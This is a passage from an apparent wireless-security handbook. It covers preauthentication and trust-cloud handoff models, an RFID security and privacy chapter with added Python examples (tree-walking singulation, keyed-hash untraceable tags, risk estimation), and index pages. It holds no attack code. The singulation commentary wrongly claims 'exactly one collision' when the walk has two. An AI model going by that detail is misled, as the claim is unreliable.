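    for line in log_lines:
        m = LOG_RE.search(line)
        if m:
            counts[m["src"]][m["dst"]] += 1
    return {src: {dst: c / sum(cnt.values()) for dst, c in cnt.items()}
            for src, cnt in counts.items()}


def select_fhr(ratios: dict, current_ap: str, service_level: str) -> list:
    """Highest-ratio APs out of current_ap until the service level's coverage target is met."""
    target, fhr, covered = COVERAGE[service_level], [], 0.0
    for ap, r in sorted(ratios.get(current_ap, {}).items(), key=lambda kv: (-kv[1], kv[0])):
        if covered >= target:
            break
        fhr.append(ap)
        covered += r
    return fhr


class FHRAuthenticator:
    """AAA-side view: the EAP success is pushed to the FHR APs and kept in soft state."""

    def __init__(self, ratios: dict, validity: float):
        self.ratios, self.validity = ratios, validity
        self.soft_state = {}   # (ap, user) -> expiry time of the preauthentication

    def full_authentication(self, user: str, ap: str, level: str, now: float) -> list:
        """Full EAP-TLS at `ap`; the EAP success message is also sent to every FHR AP."""
        fhr = select_fhr(self.ratios, ap, level)
        for fhr_ap in fhr:
            self.soft_state[(fhr_ap, user)] = now + self.validity
        return fhr

    def handoff(self, user: str, new_ap: str, level: str, now: float) -> str:
        """'fast' if new_ap holds unexpired preauthentication state, else 'full'."""
        expiry = self.soft_state.pop((new_ap, user), None)
        if expiry is not None and now <= expiry:
            return "fast"                      # only a couple of local messages needed
        self.full_authentication(user, new_ap, level, now)
        return "full"                          # validity period missed or AP not in FHR


def simulate(log_lines, level: str, moves: list, validity: float = 30.0) -> list:
    """Outcome of each (ap, time) move for one user; the first move is the initial login."""
    auth = FHRAuthenticator(movement_ratios(log_lines), validity)
    (first_ap, t0), outcomes = moves[0], ["full"]
    auth.full_authentication("u1", first_ap, level, t0)
    for ap, t in moves[1:]:
        outcomes.append(auth.handoff("u1", ap, level, t))
    return outcomes


# Constructed event log: ten handoffs out of AP1, plus one login line that is ignored.
SAMPLE_LOG = (
    ["t=%d user=u%d event=handoff from=AP1 to=AP2" % (i, i) for i in range(6)]
    + ["t=%d user=u%d event=handoff from=AP1 to=AP3" % (i, i) for i in range(6, 9)]
    + ["t=9 user=u9 event=handoff from=AP1 to=AP4",
       "t=10 user=u1 event=login ap=AP2"]
)

if __name__ == "__main__":
    print(select_fhr(movement_ratios(SAMPLE_LOG), "AP1", "silver"))  # ['AP2', 'AP3']
    print(simulate(SAMPLE_LOG, "silver", [("AP1", 0), ("AP2", 10), ("AP4", 20)]))
```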

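The trust-cloud key sharing model and its two handoff algorithms (trust-aware and trust-unaware) described above, as an added, runnable model counting full authentications per session; this is example code, not the simulator of Hassan and Landfeldt (2006). Trust links are directed (neither symmetric nor transitive), the serving RG shares the VN's key within its own trust cloud, and the asymmetric nonuniform trust generator uses the chapter's P1/P2 notion; the load threshold, the RG names, the load snapshots and the lowest-load tie-break are constructed assumptions.

```python
"""Trust-cloud key sharing between residential gateways (Hassan & Landfeldt, 2006), modelled.

Added example, not the authors' simulator. Trust links, trust clouds, key sharing within
the serving RG's cloud and the trust-aware / trust-unaware selection rules follow the
chapter; the load threshold, the load snapshots, the RG names and the tie-break rule
(lowest load first) are constructed ASSUMPTIONS.
"""
import random
from dataclasses import dataclass, field

LIGHT_LOAD = 0.8  # assumed: an RG advertising a load below this is "lightly loaded"


@dataclass
class RG:
    rg_id: str
    trust_cloud: set                                # RGs this RG has a trust link to
    load: float = 0.0                               # as advertised in its beacons
    shared_keys: set = field(default_factory=set)   # VNs whose key this RG holds

    def lightly_loaded(self) -> bool:
        return self.load < LIGHT_LOAD


def build_trust_graph(links: dict) -> dict:
    """links: rg_id -> trusted rg_ids. Directed: neither symmetry nor transitivity assumed."""
    return {r: RG(r, set(t)) for r, t in links.items()}


def random_trust_graph(n: int, p1: float, p2: float, seed: int) -> dict:
    """Asymmetric trust: for each RG pair, a forward link with prob. P1, backward with P2."""
    rng = random.Random(seed)
    ids = [f"RG{i}" for i in range(n)]
    links = {r: set() for r in ids}
    for i, a in enumerate(ids):
        for b in ids[i + 1:]:
            if rng.random() < p1:
                links[a].add(b)
            if rng.random() < p2:
                links[b].add(a)
    return build_trust_graph(links)


def share_key(rgs: dict, serving: str, vn_id: str) -> None:
    """The serving RG shares the VN's key with every RG in its own trust cloud."""
    rgs[serving].shared_keys.add(vn_id)
    for trusted in rgs[serving].trust_cloud:
        rgs[trusted].shared_keys.add(vn_id)


def pick_rg(rgs: dict, prior: str, trust_aware: bool):
    """Trust-aware: a lightly loaded RG trusted by the prior-move RG, if any exists.
    Trust-unaware (and the fallback): simply the lightest-loaded RG."""
    light = sorted((r for r in rgs if r != prior and rgs[r].lightly_loaded()),
                   key=lambda r: (rgs[r].load, r))
    if trust_aware:
        for r in light:
            if r in rgs[prior].trust_cloud:
                return r
    return light[0] if light else None


def run_session(rgs: dict, vn_id: str, start: str, load_events: list, trust_aware: bool) -> dict:
    """One VN session: hand off whenever the serving RG turns heavily loaded.
    Returns the full-authentication count (initial association + keyless handoffs)."""
    for rg in rgs.values():               # inactivity timer expired: old associations invalid
        rg.shared_keys.clear()
    serving, path, full_auths = start, [start], 1
    share_key(rgs, serving, vn_id)
    for snapshot in load_events:          # {rg_id: load} updates applied in order
        for r, load in snapshot.items():
            rgs[r].load = load
        if rgs[serving].lightly_loaded():
            continue
        nxt = pick_rg(rgs, serving, trust_aware)
        if nxt is None:                   # no lightly loaded RG: session terminated
            return {"full_auths": full_auths, "path": path, "terminated": True}
        if vn_id not in rgs[nxt].shared_keys:
            full_auths += 1               # key not predistributed: full EAP-TLS via AAA
        share_key(rgs, nxt, vn_id)        # new serving RG shares onward within its cloud
        serving = nxt
        path.append(nxt)
    return {"full_auths": full_auths, "path": path, "terminated": False}


def compare(links: dict, start: str, load_events: list) -> dict:
    """Full authentications per session, trust-aware vs trust-unaware, same scenario."""
    return {mode: run_session(build_trust_graph(links), "vn-1", start, load_events, aware)
            for mode, aware in (("trust_aware", True), ("trust_unaware", False))}


# Constructed hotspot: five RGs with directed (asymmetric, non-transitive) trust links,
# then three load snapshots: all light, A fills up (D lightest), both candidates fill up.
SAMPLE_LINKS = {"A": {"B"}, "B": {"C"}, "C": {"A"}, "D": set(), "E": {"A"}}
SAMPLE_EVENTS = [{r: 0.2 for r in SAMPLE_LINKS},
                 {"A": 0.9, "D": 0.1},
                 {"B": 0.9, "D": 0.9, "C": 0.15, "E": 0.4}]

if __name__ == "__main__":
    print(compare(SAMPLE_LINKS, "A", SAMPLE_EVENTS))
```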


Chapter XLV
Security and Privacy in RFID
Based Wireless Networks
Denis Trček
University of Ljubljana, Slovenia

ABSTRACT

Mass deployment of radio-frequency identification (RFID) technology is now becoming feasible for a wide variety of applications ranging from medical to supply chain and retail environments. Its main drawback until recently was high production costs, which are now becoming lower and acceptable. But due to inherent constraints of RFID technology (in terms of limited power and computational resources) these devices are the subject of intensive research on how to support and improve increasing demands for security and privacy. This chapter therefore focuses on security and privacy issues by giving a general overview of the field, the principles, the current state of the art, and future trends. An i[...] field of security and privacy solutions for this kind of wireless communications is desc[...]

INTRODUCTION

Radio-frequency identification (RFID) has its roots in WWII when it was used for the first time to distinguish British from German aircraft. An aircraft was challenged to communicate a certain piece of information and on this basis a decision was made on whether to attack it or not.

This principle is the core of contemporary RFID technology, although, of course, the implementation technology is significantly different. It is now based on low-cost integrated circuits (ICs) called tags. Due to the ability to currently store up to two kilobytes of data on these tags, they constitute a very attractive technology in many areas. These include manufacturing, supply chain management, inventory management, healthcare applications, air-transportation, and so forth. All items (in containers) can be scanned together, while each item can be uniquely identified and traced. These properties give RFID technology significant advantages over existing bar-code systems that currently serve for low level, operational acquisition of data in the above mentioned business environments.
Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
Security and Privacy in RFID Based Wireless Networks

These appealing properties also have drawbacks, many of them in the area of security and privacy. But as RFID is already finding its place in contemporary information systems (ISs), these issues need to be addressed seriously, which is the goal of this chapter. In the second section, the background of RFID technology is given. In the third section, threats are described and countermeasures are given. In the fourth section anticipated future trends are discussed. There is a conclusion in the fifth section, while the chapter ends with references and key definitions.

BACKGROUND OVERVIEW

Some definitions have to be given first. One basic definition in the area of computer (communications) security states that security means minimization of vulnerabilities of assets and resources (ISO, 1989). Wireless security thus means minimization of vulnerabilities of assets and resources when communicating information in electro-magnetic media through a free-space environment. Finally, RFID technology will be defined as wireless identification technology which operates on radio frequencies and deploys low-cost ICs.

A model of the RFID environment is described in Figure 1. It consists of tags (also called responders) and readers (also called transceivers). This is the front-end of RFID applications, which have their back-end in database management systems, where they are integrated with the rest of the IS (see Figure 1). It is generally assumed that RFID security and privacy is concerned with the front-end part (the left-hand side of the dashed vertical line in Figure 1). This is actually the part that is covered by the reader's signal; the tag's signal usually falls within its range.

Tags consist of a microchip and an antenna, both encapsulated in polymer material. The microchip has encoded data, called identification (ID), which typically include the manufacturer, brand, model, and serial number. Communication takes place on radio frequencies, for example, from 125 kHz to 134 kHz for security cards and from 800 MHz to 900 MHz for retail applications (Roussos, 2006). However, increasing the frequency means increased accumulation of signal in bodies containing large quantities of water or in metal.

Communication is achieved by electromagnetic coupling between readers and tags. A reader transmits a signal, which induces a voltage in the tag's antenna. This coupling provides sufficient power

Figure 1. A model of the RFID security and privacy environment (front-end: RFID tag and RFID reader, each with its own range, inside the secure environment; back-end: the information system on the other side of the dashed line)


for a tag to respond (after performing some calculations if required). If a tag is powered through this coupling, it is called a passive tag. However, if a tag has some source of energy, for example, a battery, it is called an active tag. Each type has certain advantages and disadvantages. Passive tags are cheap, but remain active until being explicitly destroyed. They have a low operating perimeter (typically 3 meters) with a relatively high error rate. In contrast, active tags have a greater operating perimeter (up to a few hundred meters), lower error rate, and cease functioning when the source of power is exhausted. However, they are significantly more expensive. Both kinds of tags can be read only, write once-read many, or rewritable.

The main barrier to mass-deployment of RFID tags is their price. A wish-price is limited by five cents, but depending on quantities and using current technologies, many application niches can already be covered. The total cost consists mainly of the cost of an antenna, which can be from €/US$ 0.1 to €/US$ 0.2, the cost of silicon, and IC production; silicon typically costs €/US$ 0.4/mm2 (Weis, 2003), while IC production depends on the number of logical gates, that is, technology. But roughly, the cost ranges from €/US$ 0.25/mm2 with 1500 gates/mm2 to €/US$ 0.8/mm2 with 60,000 gates (Weis, 2003).

A typical communication channel with a passive RFID is asymmetric. This means that forward communication, that is, communication from a reader to a tag, has a range one order of magnitude larger than backward communication, that is, from the tag to the reader. In the former case this is typically up to 100 meters, while in the latter case this is typically up to 3 meters. The reason, of course, is the power consumption constraint, which means that practical applications are limited to a range of up to 3 meters.

Thus, the cost factor dictates that a typical RFID, or a reference RFID implementation, is currently expected to have the following characteristics. It is passively powered and has 96 bits of read-only memory. These standardized bits serve to carry the tag's identity, which is unique for each tag (these IDs are stored in silicon by an imprinting process). A chip operates at 20,000 clock cycles, providing 200 read operations per second. An algorithm to respond to read primitives from a reader may be probabilistic (e.g., Aloha (Prasad & Rugierre, 2003)) or deterministic (e.g., a binary walking tree) (Juels, Rivest, & Szydlo, 2003). With such algorithms, a single tag can be identified and isolated. The related process is called singulation. Finally, the number of available gates that can be devoted to security operations is in the range of 400 to 4,000.

The above estimates are based on figures from Weis (2003) by applying Moore's law, which states that for the same price the available processing power doubles every year and a half. It is therefore clear that processing resources to support security in RFID environments are very limited, and lightweight cryptographic solutions thus provide an answer to this problem.

Moore's law also implies that there is always a point where "ordinary" cryptographic algorithms become feasible for computationally weak devices. An example of a thick RFID implementation, which is based on AES to provide authentication, can be found in the work of Feldhofer, Dominikus, and Wolkerstorfer (2004). Despite this, a permanent need exists for lightweight cryptographic protocols and also algorithms. One main reason is the gap between ordinary devices where space and power consumption are not a serious concern (e.g., tag readers, desktop systems), and weak devices with limited space and power consumption (e.g., RFID tags, smart-cards). This gap means that increased processing power affects both kinds of devices equally; in the case of a cryptographic algorithm, the key-length of this algorithm is extended. As a consequence, weak devices are again less protected because they cannot deploy such intensive computations with enlarged keys. Further, if the above use of a cryptographic algorithm can be seen as a kind of variable cost (the longer the key, the higher the processing overhead), cryptographic protocols can be seen as a fixed cost. Note that cryptographic protocols are ordinary communication protocols that deploy cryptographic algorithms; cryptographic protocols are often referred to as security services, while cryptographic algorithms are referred to as security mechanisms. Both kinds of costs contribute to the total processing power
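The deterministic singulation algorithm mentioned above (binary tree walking) is easiest to understand by running it. The following is an added example written for this page, not code from the chapter or from Juels, Rivest, and Szydlo: the reader broadcasts an ID prefix, every tag whose ID starts with it answers with its next bit, and on a collision the reader descends into both subtrees. The ID length and the three tag IDs are constructed for the demonstration (the text gives 96-bit IDs for real tags). The last function shows the privacy consequence of the range asymmetry described above: the prefixes the reader broadcasts on its far-reaching forward channel spell out every tag ID, so anyone who hears only the reader still learns the IDs.

```python
"""Binary tree-walking singulation, simulated (added example, not the chapter's code)."""
from typing import Iterable, List, Optional, Set, Tuple

ID_BITS = 8  # constructed demo length; production tags carry 96-bit IDs


def tag_responses(tags: Iterable[str], prefix: str) -> Set[str]:
    """Set of bits heard on the air after the reader broadcasts `prefix`.

    Each tag whose ID starts with `prefix` transmits the bit that follows it.
    The reader cannot tell how many tags sent the same bit; it only sees
    {'0'}, {'1'}, {'0', '1'} (a collision) or the empty set (no tag matched).
    """
    return {t[len(prefix)] for t in tags if t.startswith(prefix) and len(t) > len(prefix)}


def tree_walk(tags: List[str], prefix: str = "", trace: Optional[List[str]] = None) -> List[str]:
    """Return every tag ID below `prefix`, appending each broadcast prefix to `trace`."""
    if trace is not None:
        trace.append(prefix)
    if len(prefix) == ID_BITS:
        # A full-length prefix is reached only by following tag answers, so it is a real ID.
        return [prefix]
    found: List[str] = []
    for bit in sorted(tag_responses(tags, prefix)):  # on a collision both branches are walked
        found.extend(tree_walk(tags, prefix + bit, trace))
    return found


def singulate_all(tags: List[str]) -> Tuple[List[str], int]:
    """Identify every tag in range and report how many reader queries it took."""
    trace: List[str] = []
    ids = tree_walk(tags, "", trace)
    return ids, len(trace)


def ids_exposed_on_forward_channel(trace: List[str]) -> List[str]:
    """Full IDs recoverable by an observer who hears only the reader's side.

    The reader's forward signal carries the prefixes it asks for, and the final
    prefix of each successful branch is a complete tag ID. Since the forward
    channel reaches about ten times farther than the tags' replies (see text),
    this is the part of singulation that matters most for privacy.
    """
    return [p for p in trace if len(p) == ID_BITS]


DEMO_TAGS = ["00101101", "00101110", "11000001"]  # constructed sample population

if __name__ == "__main__":
    found, queries = singulate_all(DEMO_TAGS)
    print(found, "identified in", queries, "reader queries")
```

Two of the constructed IDs share the prefix 001011, so the walk sees exactly one collision and resolves it with two extra queries; the population is isolated in 19 broadcasts, far fewer than the 256 an exhaustive 8-bit scan would need, which is the point of the deterministic scheme.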



requirements, and have to be kept low while at the same time enabling a comparable level of security to weak devices. This leads to a whole new research area (Juels, 2004).

RFID THREATS AND COUNTERMEASURES

The very basic threat to each and every tag is that it remains active when it is no longer supposed to be active. To counter this problem, RFID logic may implement a kill operation, which means that upon receipt of a certain communication primitive, the tag becomes permanently inoperative by, for example, blowing a fuse in its circuitry. A more bullet-proof solution is exposure of the RFID to microwave radiation that melts its metalized layer.

Risk management drives each and every provision of security and privacy in ISs. A typical process is depicted in Figure 2. It starts with the identification of assets A (A = {a1, a2, …, an}) and threats T (T = {t1, t2, …, tm}) to those assets. For each asset and threat, that is, the Cartesian product A × T = {(a1, t1), (a1, t2), …, (an, tm)}, related vulnerabilities are identified together with the likelihood of a threat to get into interaction with the asset during a certain period of time. On this basis, the estimated damage D(ai, tj) caused by interaction between asset ai and threat tj during this period is calculated. The result presents the upper bound for investment in safeguards. A certain degree of risk, called residual risk, is usually accepted and taken into account. This often makes sense economically. But in the majority of cases, a threat cannot be completely neutralized (Trček, 2006).

The challenging parts of this process are identification of threats and their probabilities. For identification of threats in RFID environments a comprehensive taxonomy from Garfinkel, Juels, and Pappu (2005) can be used. The first four threats are related to corporate security, and the rest to personal privacy:

• Corporate espionage threat: Tagged products may enable remote acquisition of supply chain details like logistics details, volumes, and so forth.
• Competitive marketing threat: Tags may enable access to customers' preferences and use of the data gathered for competition.
• Infrastructure attacks threat: Where RFID is central to a competitor's advantage, disruption of RFID operations becomes an important point for attack.

Figure 2. Risk management process



• Trust perimeter threat: Gathering additional volumes of data through RFID introduces new challenges related to sharing information in a trustworthy way.
• Action threat: Individuals' actions may be monitored.
• Association threat: When tagged products are associated with an individual's ID (e.g., loyalty programs), these persons can be associated not only with the type of product, but with the exact product, due to its unique ID.
• Location threat: Tags can be triggered by covert readers at various locations to reveal a person's location.
• Preference threat: Tags disclose preferences of customers and help to identify, for example, more wealthy ones.
• Constellation and transaction threats: The constellation threat is similar to the location threat, but in this case the identity of a customer is not known. Despite this, a particular person can be spotted and traced. Further, by chaining one constellation threat with another, a whole chain of actions, or transactions, becomes traceable.
• Breadcrumb threat: When products are disposed of with their original tags, an attacker may use them and is tracked with a falsified identity. This is actually just another kind of identity theft.

On top of all this, a fundamental threat exists, called tag cloning, and such cloning has been successfully demonstrated (Bono, Green, Stubblefield, Juels, Rubin, & Szydlo, 2005). What countermeasures are at our disposal?

The basic option was mentioned at the beginning with the physical destruction of a tag (e.g., by exposure to microwaves or implementation of a logical kill command that makes the chip inoperable). But the fact is that the latter approach often has flaws in implementations; logically killed tags may remain active or be reactivated (Roussos, 2006). In many situations it might be even beneficial to keep these tags active; for example, tagged items may be used for smart-home applications or to help disabled people.

The most common approach to security and privacy is by deploying cryptography. Using cryptographic mechanisms (e.g., symmetric and asymmetric cryptographic algorithms, strong one-way hash functions), the following cryptographic services can be implemented (ISO, 1995):

• Authentication: This ensures that the peer communicating entity is the one claimed.
• Confidentiality: This prevents unauthorized disclosure of data.
• Integrity: This ensures that any modification, insertion, or deletion of data is detected.
• Access control: This enables authorized use of resources.
• Nonrepudiation: This provides proof of origin and proof of delivery, such that false denial of the message content is prevented.
• Auditing: This enables detection of suspicious activities and analysis of successful breaches. It provides evidence when resolving legal disputes.

In the case of RFID tags, authentication, confidentiality, and access control can be applied to counter the threats described at the beginning of this section. But to make these security services operational, key management (i.e., handling of cryptographic algorithms' keys) has to be resolved (Trček). This is a complex issue in open environments and has been known as such for almost two decades. Suffice it to say that only very simple key management schemes are acceptable for RFID environments.

With regard to security and privacy, it is required that authentication, and consequently access control, is provided only to legitimate readers. Further, rogue readers should not be disclosed a tag's ID, but should also be prevented from tracing a tag, regardless of the inaccessibility of its ID. Put another way, when rogue readers interact with a tag, it should be practically impossible (i.e., computationally difficult) to link the multiple manifestations of a tag to this very tag.
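The untraceability requirement just stated (a legitimate reader identifies the tag, a rogue reader learns neither the ID nor whether two sightings belong to the same tag) can be made concrete with a small simulation. This is an added example, not the chapter's own scheme: it uses a keyed hash over a reader nonce and a fresh tag nonce, with a per-tag secret held in the back-end table, as an assumption for the illustration; the tag IDs and keys are constructed. The plain "transmit your ID" tag is included beside it as the weak baseline the threats above exploit.

```python
"""Untraceable tag responses versus a static-ID tag (added example, not the chapter's code)."""
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Tuple

Reply = Tuple[bytes, bytes]  # (tag nonce, keyed-hash tag)

# Constructed back-end table: 96-bit tag ID -> per-tag secret key (assumption for this example).
TAG_KEYS: Dict[bytes, bytes] = {
    bytes.fromhex("0123456789abcdef01234567"): b"constructed-key-A",
    bytes.fromhex("fedcba9876543210fedcba98"): b"constructed-key-B",
}


def static_tag_reply(tag_id: bytes) -> bytes:
    """Weak baseline: a tag that transmits its ID to whoever queries it."""
    return tag_id


def private_tag_reply(key: bytes, reader_nonce: bytes, tag_nonce: Optional[bytes] = None) -> Reply:
    """Hardened tag: answer MAC(key, reader_nonce || tag_nonce) with a fresh tag nonce.

    The ID never goes on the air and each reply looks random to anyone without
    the key. `tag_nonce` may be supplied explicitly for reproducible tests.
    """
    s = tag_nonce if tag_nonce is not None else secrets.token_bytes(8)
    tag = hmac.new(key, reader_nonce + s, hashlib.sha256).digest()[:8]
    return s, tag


def legitimate_reader_identify(reader_nonce: bytes, reply: Reply) -> Optional[bytes]:
    """Back-end lookup: try every key until one reproduces the tag's MAC.

    The linear scan over the key table is the price of untraceability in a
    scheme this simple; it is paid by the reader, not by the 400-4,000-gate tag.
    """
    s, tag = reply
    for tag_id, key in TAG_KEYS.items():
        expected = hmac.new(key, reader_nonce + s, hashlib.sha256).digest()[:8]
        if hmac.compare_digest(expected, tag):
            return tag_id
    return None


def rogue_reader_can_link(seen_1, seen_2) -> bool:
    """A keyless observer can only compare the raw transcripts it captured."""
    return seen_1 == seen_2


if __name__ == "__main__":
    tag_id, key = next(iter(TAG_KEYS.items()))
    nonce = secrets.token_bytes(8)
    first, second = private_tag_reply(key, nonce), private_tag_reply(key, nonce)
    print("identified:", legitimate_reader_identify(nonce, first) == tag_id)
    print("rogue can link two sightings:", rogue_reader_can_link(first, second))
```

The reader nonce also gives replay protection for free: a reply captured under one nonce does not verify under another, so a recorded transcript cannot be played back later to impersonate the tag.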


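The risk management process described at the start of this section (assets A, threats T, and an estimated damage D(ai, tj) for each pair in A × T, summed to give the upper bound for safeguard investment, with a residual risk that is consciously accepted) is worked through below. This is an added example and not the chapter's own code; the assets, threats, likelihoods and damage figures are constructed for a one-year period, and the threat names are taken from the taxonomy above.

```python
"""Expected-loss estimation over A × T (added example, not the chapter's code)."""
from itertools import product
from typing import Dict, List, Tuple

Pair = Tuple[str, str]

# Constructed sets: A = {a1, a2} and T = {t1, t2, t3}.
ASSETS = ["tagged inventory", "loyalty-programme database"]
THREATS = ["corporate espionage", "tag cloning", "location tracking"]

# Constructed estimates for one year: likelihood that threat t interacts with
# asset a within the period, and the damage D(a, t) such an interaction causes.
LIKELIHOOD: Dict[Pair, float] = {
    ("tagged inventory", "corporate espionage"): 0.10,
    ("tagged inventory", "tag cloning"): 0.05,
    ("tagged inventory", "location tracking"): 0.30,
    ("loyalty-programme database", "corporate espionage"): 0.02,
    ("loyalty-programme database", "tag cloning"): 0.01,
    ("loyalty-programme database", "location tracking"): 0.20,
}
DAMAGE: Dict[Pair, float] = {
    ("tagged inventory", "corporate espionage"): 50_000,
    ("tagged inventory", "tag cloning"): 200_000,
    ("tagged inventory", "location tracking"): 5_000,
    ("loyalty-programme database", "corporate espionage"): 100_000,
    ("loyalty-programme database", "tag cloning"): 20_000,
    ("loyalty-programme database", "location tracking"): 30_000,
}


def expected_damage(assets: List[str], threats: List[str],
                    likelihood: Dict[Pair, float], damage: Dict[Pair, float]) -> Dict[Pair, float]:
    """Expected loss per pair over the Cartesian product A × T; unrated pairs count as 0."""
    return {
        (a, t): likelihood.get((a, t), 0.0) * damage.get((a, t), 0.0)
        for a, t in product(assets, threats)
    }


def safeguard_budget_upper_bound(exposure: Dict[Pair, float]) -> float:
    """Total expected loss for the period: spending more than this on safeguards cannot pay off."""
    return sum(exposure.values())


def split_residual(exposure: Dict[Pair, float], accept_below: float):
    """Separate pairs worth treating from those accepted as residual risk."""
    treat = {p: v for p, v in exposure.items() if v >= accept_below}
    residual = {p: v for p, v in exposure.items() if v < accept_below}
    return treat, residual


def ranked(exposure: Dict[Pair, float]):
    """Pairs ordered by expected loss, highest first, to prioritise countermeasures."""
    return sorted(exposure.items(), key=lambda kv: kv[1], reverse=True)


if __name__ == "__main__":
    exposure = expected_damage(ASSETS, THREATS, LIKELIHOOD, DAMAGE)
    for (asset, threat), loss in ranked(exposure):
        print(f"{asset:28s} {threat:22s} {loss:10.0f}")
    print("upper bound for safeguard investment:", safeguard_budget_upper_bound(exposure))
    print("accepted as residual risk:", split_residual(exposure, accept_below=1_000)[1])
```

With the constructed figures the ranking puts tag cloning against the inventory first, which matches the chapter's description of cloning as the fundamental threat, while the low-likelihood, low-damage pair is the one left as residual risk.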
Index

packet radio network (PRNET) 640
packet switch (PS) 298
packet switched (PS) 321
pair-wise maser key (PMK) 714
pair-wise master key (PMK) 702
pairwise transient key (PTK) 304
passive tag 725
password authentication 195
password authentication protocol (PAP) 160, 779
path key establishment 645
peer-to-peer (P2P) network, and security 95–103
peer-to-peer paradigm (P2P) 438
peer intermediaries for key establishment (PIKE) 491
perfect forward secrecy (PFS) 290
perimeter security (PS) 373
personal area network (PAN) 13, 148, 396
personal area networks (PAN) 277
point-to-point protocol (PPP) 777
policy decision points (PDP) 282
policy enforcement points (PEP) 282
polynomial share 645
port access entity (PAE) 701
power control 652
presence and availability working Group (PAG) 389
presence and availability working group (PAG) 390
pretty good privacy (PGP) 483
Privacy 209
privacy 115
privacy, and authentication 14
privacy, and authorization 14
privacy, and security 14
privacy, and trust 14
privacy-enhancing techniques 115–128
privacy key management (PKM) 201
privacy key management for extensible authentication protocol (PKM-EAP) 373
privacy preserving routing (PPR) 441
privacy protection 116
proactive key caching (PKC) 716
probabilistic forwarding (PFR) 642
protected EAP (PEAP) 375
protected extensible authentication protocol (PEAP) 777
protocol environments 211
proxy call session control function (P-CSCF) 343
pseudo-random number generator (PRNG) 698
pseudonyms, and identity 120
public-key cryptography 571
public-key cryptography (PKC) 612
public access wireless networks (PAWNs) 285
public key certificates (PKC) 205
public key infrastructure (PKI) 256, 386, 484, 485, 766, 781
public key interface (PKI) 388
public land mobile network (PLMN) 298, 367
public land mobile networks (PLMN) 273
public switched telephone network (PSTN) 284

Q

quality of protection (QoP) 240
quality of service (QoS) 105, 240, 280, 344, 500, 766

R

radio-frequency identification (RFID) 723
radio access network (RAN) 340
radio access networks (RANs) 277
radio frequency fingerprinting (RFF) 84
radio network controller (RNC) 320, 340, 365, 763
radio network service node (RNSN) 376
RADIUS protocol 196
random challenge (GPRS-RAND) 355
random number (RAND) 322
reactive routing protocols 640
registration authority (RA) 486
related signed response (GPRS-SRES) 355
relative neighborhood graph (RNG) 656
remote authentication dial in user service (RADIUS) 14, 158, 776
removable user identity module (R-UIM) 388
repeater stations (RSs) 201
replay attack 419
reputation mechanisms 417
request-to-send (RTS) 418
residential gateways (RG) 711
rfmon 63

roaming agreements 281
Ron's Cipher #4 (RC4) 240
round trip times (RTT) 275
group temporal key (GTK) 702
router advertisement (RA) 398
route reply (RREP) 435
route request (RREQ) 419, 435
routing area identity (RAI) 354

S

scanning, passive 81
second-generation (2G) 339
second generation (2G) 274, 319, 351
second hand information (SHI) 610
secure ad hoc distance vector (SAODV) 522
secure and efficient key management (SEKM) 510
secure AODV (SAODV) 420
secure communication 779
secure directed diffusion (SDD) 644
secure distributed anonymous routing protocol (SDAR) 439
secure efficient ad hoc distance vector routing protocol (SEAD) 420
secure hash algorithm-1 (SHA-1) 257
secure network encryption protocol (SNEP) 603
secure positioning for sensor networks (SPINE) 572
Secure routing 588
secure routing protocol (SRP) 420, 451, 488
secure service discovery 11–27
secure socket layer (SSL) 198, 239, 364, 373
secure transient association 422
secure user plane location (SUPL) 390
security, and multimedia watermarking 239
security, authentication 189
security, black-box 30
security, firewall issues 95–103
security, infrastructure-based 15
security, in home networks 184
security, in wireless environment 183
security, P2P 95–103
security, requirements in wireless environments 79
security, smart space dependent 18
security, tamper resistant storage 148
Security Architecture 766
security architecture 760
security association (SA) 398
security association identifier (SAID) 766
security attacks 481
security gateways (SEGs) 325
security goals 481
security mechanisms 725
security parameter establishment (SPE) 438
Security Parameter Index (SPI) 202
security protocol 764
security protocols 776
Security Service 731
security services 725
security sublayer 750
self-organized CA (SOCA) 510
self-protection problem 660
semantic access control policies 469
semantic context-driven access control 467
sensor applications 652
sensor coverage 652
sensor network 568, 652
sensor protocols for information via negotiation (SPIN) 642
service-oriented 280
service contract 281
service discovery and advertisement (SDA) 11
service orientation 11
service provider 57–58
service provider networks (SPNs) 281
service providers 281
services 281
service set identification (SSID) 289
service set identifier (SSID) detection 81
serving call-session-control-function (S-CSCF) 381
serving call session control function (S-CSCF) 343
Serving GPRS support node (SGSN) 299
serving GPRS support node (SGSN) 320, 341, 368
serving GSN (SGSN) 352
serving network (SN) 319, 355
Session hijack 783
session initiation protocol (SIP) 340

session MAC 632
shared key authentication (SKA) 697
shared key discovery phase 645
short message service (SMS) 274, 380
signaling system 7 (SS7) 356
Signalling System 7 (SS7) 180
signed response (GPRS-SRES) 355
single sign-on 55–56
single sign-on (SSO) protocol 178
sink hole attack 644
skinny tree (STR) 495
sleep deprivation attack 643
Sleeper protocol 18
smart card 153
sniffing 81
software agent 28
spoofing 82
Sprite 421
SSRD protocol 19
Static keying 645
stationary secure database (SSD) 540
Statistic en-route filtering mechanism (SEF) 630
subscriber identity module (SIM) 353, 354, 380, 783
subscriber stateful firewall (SSF) 372
subscriber station (SS) 766
support of the current serving GSN (SGSN) 763
Sybil attack 444, 644
Symmetric cryptography 575
system-on-chip design 256
system architecture evolution (SAE) 391
system design 652

T

tag's identity 725
tags 723
tatistic en-route filtering (SEF) 634
telecoms & Internet converged services & protocols for advanced networks (TISPAN) 390
temporal key integrity protocol (TKIP) 304, 700, 780, 784
temporary identities (TMSI, TLLI) 360
temporary logical link identity (TLLI) 354
temporary mobile subscriber identities (TMSI) 763
temporary mobile subscriber identity (TMSI) 199, 354
third generation (3G) 318
threat protection system (TPS) 373
three-party key-distribution (3PKD) 217
ticket granting server (TGS) 200
time-to-live (TTL) 557
time division-synchronous CDMA (TD-SCDMA) 339
time division multiple access (TDMA) 273, 641, 767
time division multiplex (TDM) 683
topologically-inspired attack 643
topology 654
topology control 652
topology design 661
total access communication system (TACS) 273
TRAFFIC 422
traffic 130
transmission control protocol (TCP) 162
transport encryption key (TEK) 766
transport layer security (TLS) 328, 364, 386, 711, 712, 752, 767
transport layer security (TLS) protocol 162
tree-based group Diffie-Hellman (TGDH) 494
triple data encryption standard (3DES) 240
Trojan horse, Drever 5
Trojan horse, Locknut 5
Trojan horse, Skuller 5
trust, definition and principles 464
Trust Cloud 721
trust context 646
trusted third party 56–57
trusted third party (TTP) 423, 483
Trust Link 721
trust management 190, 461, 464, 636
trust management, advances in 191–192
trust management, systems 465
trust models 484
